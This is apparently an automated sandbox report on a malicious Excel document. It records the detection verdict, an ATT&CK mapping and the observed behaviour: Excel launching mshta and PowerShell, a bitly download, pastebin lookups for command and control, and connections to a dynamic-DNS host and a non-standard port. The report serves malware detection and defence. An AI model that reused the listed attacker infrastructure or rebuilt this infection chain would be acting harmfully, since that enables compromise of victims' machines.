Analysis Report Mcg4yE0diN.xls

Overview

General Information

Joe Sandbox Version:	26.0.0
Analysis ID:	815771
Start date:	13.03.2019
Start time:	21:16:40
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 4m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Mcg4yE0diN.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java)
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@90/16@12/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 24 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Unable to detect Microsoft Excel Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe Execution Graph export aborted for target mshta.exe, PID 1228 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	100	0 - 100	Report FP / FN	false

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Command-Line Interface1	Scheduled Task1	Process Injection11	Web Service1	Credential Dumping	Process Discovery1	Application Deployment Software	Data from Local System1	Data Encrypted1	Web Service1
Replication Through Removable Media	Scheduled Task1	Port Monitors	Scheduled Task1	Disabling Security Tools31	Network Sniffing	Security Software Discovery13	Remote Services	Clipboard Data1	Exfiltration Over Other Network Medium	Uncommonly Used Port1
Drive-by Compromise	PowerShell2	Accessibility Features	Path Interception	Process Injection11	Input Capture	Remote System Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Remote Access Tools1
Exploit Public-Facing Application	Scripting52	System Firmware	DLL Search Order Hijacking	Deobfuscate/Decode Files or Information1	Credentials in Files	File and Directory Discovery1	Logon Scripts	Input Capture	Data Encrypted	Standard Non-Application Layer Protocol3
Spearphishing Link	Exploitation for Client Execution13	Shortcut Modification	File System Permissions Weakness	Scripting52	Account Manipulation	System Information Discovery32	Shared Webroot	Data Staged	Scheduled Transfer	Standard Application Layer Protocol13
Spearphishing Attachment	Graphical User Interface	Modify Existing Service	New Service	Obfuscated Files or Information1	Brute Force	System Owner/User Discovery	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port

Signature Overview

Click to jump to signature section

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Jump to behavior

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: www.bitly.com

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49224 -> 172.217.168.33:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49222 -> 67.199.248.14:80

Networking:

Connects to a URL shortener service

Show sources

Source: unknown

DNS query: name: bitly.com

Connects to a pastebin service (likely for C&C)

Show sources

Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49230 -> 216.170.123.122:2336

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: pussi244.ddns.net

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET /SexoPhone2 HTTP/1.1Accept: /Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.bitly.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SexoPhone2 HTTP/1.1Accept: /Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bitly.comConnection: Keep-Alive

Downloads files

Show sources

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\SexoPhone2[1].htm

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /SexoPhone2 HTTP/1.1Accept: /Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.bitly.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SexoPhone2 HTTP/1.1Accept: /Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bitly.comConnection: Keep-Alive

Found strings which match to known social media urls

Show sources

Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <SuggestionsURL>http://ie.search.yahoo.com/os?command={SearchTerms}</SuggestionsURL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <FavoriteIcon>http://search.yahoo.co.jp/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <FavoriteIcon>http://search.yahoo.com/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://br.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://de.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://es.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://espanol.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://fr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://in.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://it.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://kr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://ru.search.yahoo.com</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://sads.myspace.com/</URL> equals www.myspace.com (Myspace)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://search.cn.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://search.yahoo.co.jp</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://tw.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://uk.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: mshta.exe, 00000002.00000002.1666486840.05620000.00000008.sdmp	String found in binary or memory: Free Hotmail.url equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000002.00000002.1665823784.053A0000.00000004.sdmp	String found in binary or memory: Share to Facebook equals www.facebook.com (Facebook)
Source: mshta.exe, 00000002.00000002.1665823784.053A0000.00000004.sdmp	String found in binary or memory: Twitter equals www.twitter.com (Twitter)
Source: mshta.exe, 00000002.00000002.1665823784.053A0000.00000004.sdmp	String found in binary or memory: facebook equals www.facebook.com (Facebook)
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000002.00000003.1626734499.0362E000.00000004.sdmp, 3722393240-widgets[1].js.2.dr	String found in binary or memory: q.Md=function(){return"https://twitter.com/intent/tweet?text="+encodeURIComponent(this.na+": "+this.W)};q.Kd=function(){return"https://m.facebook.com/sharer.php?u="+encodeURIComponent(this.W)+"&t="+encodeURIComponent(this.na)};q.Jd=function(){return"mailto:?subject="+encodeURIComponent(this.na)+"&body="+encodeURIComponent(this.W)};q.Ld=function(){return"https://plus.google.com/share?source=blogger:mobile:share&url="+encodeURIComponent(this.W)};q.Db=function(){this.show(!1)};var qk=/^((http(s)?):)?\/\/((((lh[3-6](-tt\|-d[a-g,z])?\.((ggpht)\|(googleusercontent)\|(google)))\|(([1-4]\.bp\.blogspot)\|(bp[0-3]\.blogger))\|((((cp\|ci\|gp)[3-6])\|(ap[1-2]))\.(ggpht\|googleusercontent))\|(gm[1-4]\.ggpht)\|(((yt[3-4])\|(sp[1-3]))\.(ggpht\|googleusercontent)))\.com)\|(dp[3-6]\.googleusercontent\.cn)\|(lh[3-6]\.(googleadsserving\.cn\|xn--9kr7l\.com))\|(photos\-image\-(dev\|qa)(-auth)?\.corp\.google\.com)\|((dev\|dev2\|dev3\|qa\|qa2\|qa3\|qa-red\|qa-blue\|canary)[-.]lighthouse\.sandbox\.google\.com\/image)\|(image\-(dev\|qa)\-lighthouse(-auth)?\.sandbo
Source: mshta.exe, 00000002.00000003.1626734499.0362E000.00000004.sdmp, 3722393240-widgets[1].js.2.dr	String found in binary or memory: q.Md=function(){return"https://twitter.com/intent/tweet?text="+encodeURIComponent(this.na+": "+this.W)};q.Kd=function(){return"https://m.facebook.com/sharer.php?u="+encodeURIComponent(this.W)+"&t="+encodeURIComponent(this.na)};q.Jd=function(){return"mailto:?subject="+encodeURIComponent(this.na)+"&body="+encodeURIComponent(this.W)};q.Ld=function(){return"https://plus.google.com/share?source=blogger:mobile:share&url="+encodeURIComponent(this.W)};q.Db=function(){this.show(!1)};var qk=/^((http(s)?):)?\/\/((((lh[3-6](-tt\|-d[a-g,z])?\.((ggpht)\|(googleusercontent)\|(google)))\|(([1-4]\.bp\.blogspot)\|(bp[0-3]\.blogger))\|((((cp\|ci\|gp)[3-6])\|(ap[1-2]))\.(ggpht\|googleusercontent))\|(gm[1-4]\.ggpht)\|(((yt[3-4])\|(sp[1-3]))\.(ggpht\|googleusercontent)))\.com)\|(dp[3-6]\.googleusercontent\.cn)\|(lh[3-6]\.(googleadsserving\.cn\|xn--9kr7l\.com))\|(photos\-image\-(dev\|qa)(-auth)?\.corp\.google\.com)\|((dev\|dev2\|dev3\|qa\|qa2\|qa3\|qa-red\|qa-blue\|canary)[-.]lighthouse\.sandbox\.google\.com\/image)\|(image\-(dev\|qa)\-lighthouse(-auth)?\.sandbo
Source: mshta.exe, 00000002.00000002.1665823784.053A0000.00000004.sdmp	String found in binary or memory: twitter equals www.twitter.com (Twitter)
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: www.bitly.com

Urls found in memory or binary data

Show sources

Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp	String found in binary or memory: Https://treffictesgn.blogspot.com/p/blog-page.html
Source: mshta.exe, 00000002.00000002.1666486840.05620000.00000008.sdmp	String found in binary or memory: http://%s.com
Source: mshta.exe, 00000002.00000003.1617348974.012EE000.00000004.sdmp	String found in binary or memory: http://D.K
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://amazon.fr/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: mshta.exe, 00000002.00000002.1666486840.05620000.00000008.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: mshta.exe, 00000002.00000002.1661035852.00169000.00000004.sdmp	String found in binary or memory: http://bitly.com/
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: http://bitly.com/SexoPhone2
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: http://bitly.com/SexoPhone2.
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: http://bitly.com/SexoPhone23
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://busca.orange.es/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://cnet.search.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 0000000C.00000002.1792091760.00180000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0r
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000C.00000002.1792091760.00180000.00000004.sdmp	String found in binary or memory: http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl0
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000C.00000002.1792091760.00180000.00000004.sdmp	String found in binary or memory: http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%
Source: mshta.exe, 00000002.00000003.1626734499.0362E000.00000004.sdmp, 3722393240-widgets[1].js.2.dr	String found in binary or memory: http://csi.gstatic.com/csi
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://es.ask.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://find.joins.com/
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://fontfabrik.comQ
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://home.altervista.org/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://list.taobao.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://mail.live.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000C.00000002.1792091760.00180000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca4.com0
Source: powershell.exe, 0000000C.00000002.1792091760.00180000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca4.com0D
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
